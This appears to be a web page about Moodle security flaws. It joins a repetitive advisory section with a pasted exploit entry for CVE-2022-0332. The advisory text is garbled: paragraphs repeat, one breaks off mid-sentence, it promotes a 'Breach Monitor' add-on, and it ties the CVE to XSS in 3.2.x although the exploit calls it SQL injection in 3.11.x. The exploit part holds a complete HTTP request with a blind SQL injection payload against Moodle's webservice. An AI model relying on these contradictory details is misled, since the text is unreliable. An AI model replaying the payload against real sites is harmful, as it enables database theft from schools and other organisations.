All Moodle installations on the affected server versions were patched to prevent exploitation. If you suspect your site may have been vulnerable, consider installing a Breach Monitor add-on to get alerted immediately if your site is breached.

Moodle was also found to be vulnerable to cross-site request forgery attacks in 3.2.4. A malicious user could execute a request against one of your Moodle installations to change the site’s settings or add an administrator.
In versions 3.2.2 to 3.2.4, a cross-site scripting risk was identified that could lead to arbitrary code execution.

An unauthenticated user could access the ‘Add and remove groups’ page and add themselves to a group.

Moodle was also found to be vulnerable to cross-site request forgery attacks in 3.2.2. A malicious user could execute a request against one of your Moodle installations to change the site’s settings or add an administrator.
In versions 3.2.2 to 3.2.4, a cross-site scripting risk was identified that could lead to arbitrary code execution.
An unauthenticated user could access the ‘Add and remove groups’ page and add themselves to a group.

Moodle was also found to be vulnerable to cross-site request forgery attacks in 3.2.4. A malicious user could execute a request against one of your Moodle installations to

1.1

- CVE-2022-0332
The Moodle team has confirmed a vulnerability in the 3.2.4, 3.2.2 and 3.2 versions of Moodle which allows for XSS attacks to be executed against all installations on the server using that version of Moodle.
- The vulnerability is related to the "Add and remove groups" functionality, which is not able to verify that any user is authorized to change their membership to or from groups, allowing attackers to add users without their knowledge or consent.
- To prevent exploitation via this vulnerability, please upgrade your Moodle installation immediately through a secure patching process (see below). If you are unable to upgrade your installation at this time, consider installing a Breach Monitor add-on to get alerted immediately if your site is breached.

Installing Breach Monitor

If you suspect your site may have been vulnerable, consider installing a Breach Monitor add-on to get alerted immediately if your site is breached.

Exploit

# Exploit Title: Moodle 3.11.4  - SQL Injection
# Date: 30/01/2022
# Exploit Author: lavclash75
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.11 to 3.11.4
# CVE: CVE-2022-0332
# POC

```
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

```

```

```

![PHP](img/orderby.jpg?raw=true "PHP")
![PHP](img/uri.jpg?raw=true "PHP")
![PHP](img/sqlmap.jpg?raw=true "PHP")

# Reference
 * [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
 * [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)

Timeline

Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 14:09:00 UTC

References